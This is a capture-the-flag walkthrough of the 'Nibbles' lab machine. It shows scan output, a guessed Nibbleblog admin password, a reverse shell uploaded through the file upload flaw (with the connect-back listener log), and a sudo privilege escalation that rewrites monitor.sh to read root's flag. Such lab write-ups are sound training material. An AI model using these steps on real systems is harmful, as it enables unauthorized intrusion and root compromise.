Nibbles

OS: Linux, Difficulty: Easy, IP: 10.10.10.75

Initial Enumeration

# Nmap 7.70 scan initiated Sun Jul 7 12:18:27 2019 as: nmap -sV -sC -O -A -p 22,80 -oN O-detailed 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.8 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 250.62 ms 10.10.14.1
2 247.36 ms 10.10.10.75
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 7 12:18:51 2019 -- 1 IP address (1 host up) scanned in 24.98 seconds
Home page: nothing too exciting.
Source code: a reference pointing to a directory.

Just to be sure, I ran gobuster against both the web root and the nibbleblog directory.

root directory
/server-status (Status: 403)
nibbleblog directory
/content (Status: 301)
/themes (Status: 301)
/admin (Status: 301)
/plugins (Status: 301)
/README (Status: 200)
/languages (Status: 301)

All the directories had some juicy information; however, the most interesting one was admin, so I jumped over to it.

/admin/ was not interesting, so I tried admin.php next.
Admin Page
-------------------------------------------------------  ----------------------------------
Exploit Title                                           | Path (/usr/share/exploitdb/)
-------------------------------------------------------  ----------------------------------
Nibbleblog 3 - Multiple SQL Injections                  | exploits/php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)   | exploits/php/remote/38489.rb
-------------------------------------------------------  ----------------------------------

Did a searchsploit and found an arbitrary file upload vulnerability. However, it was a Metasploit module, so in OSCP spirit I searched the internet to learn how to exploit this vulnerability manually. The vulnerability requires admin credentials, which even after enumerating I was not able to harvest from the website or its source code, so they had to be guessed.

Credentials were: admin:nibbles

Followed the exact steps with the https://github.com/pentestmonkey/php-reverse-shell shell and got a shell as the nibbler user.

listening on [any] 9999 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.75] 39186
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
03:16:12 up 35 min, 0 users, load average: 0.00, 0.00, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

User Own

$ cat /home/nibbler/user.txt
b02ff***

Root Own

$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

As per sudo -l I can run the mentioned script as root without any password; however, the interesting part of this output is sudo: unable to resolve host Nibbles: Connection timed out. This means that when I try to run anything through sudo it will not execute successfully, because the hostname and hosts files are messed up.

Had to google around to finally reach a promising solution that did not require modifying the /etc/hosts or /etc/hostname files, which I cannot do anyway as a low-privileged user on the box.

This helped me resolve the issue.

$ sudo -h 127.0.0.1 -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

No more error message, which means I can now run the script; however, before that the script has to be modified to get the root flag.

As evident from the directory listing, neither the script nor the folder named in the sudo rule existed; however, there was a zip file named personal.zip. Unzipping it produced the exact same structure as the one specified in the sudo rule. All I had to do was replace the original monitor.sh with my modified version and run it.

Modified monitor.sh in /home/nibbler/personal/stuff/monitor.sh
#! /bin/bash
cat /root/root.txt > /tmp/root
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -h 127.0.0.1 /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ cd /tmp
nibbler@Nibbles:/tmp$ ls -l
total 12
-rw-r--r-- 1 root root 33 Jul 7 03:26 root
drwx------ 3 root root 4096 Jul 7 02:40 systemd-private-a84379fcac92492c830c351c228addd0-systemd-timesyncd.service-XsPwpn
drwx------ 2 root root 4096 Jul 7 02:40 vmware-root
nibbler@Nibbles:/tmp$ cat root
b6d74***

Learning Outcome

Learned a little more about how sudo can still be used when some of the host's settings are not working properly. Learned how to exploit NibbleBlog 4.0.3, which was relatively easy. I am very bad, like really bad, at credential guessing.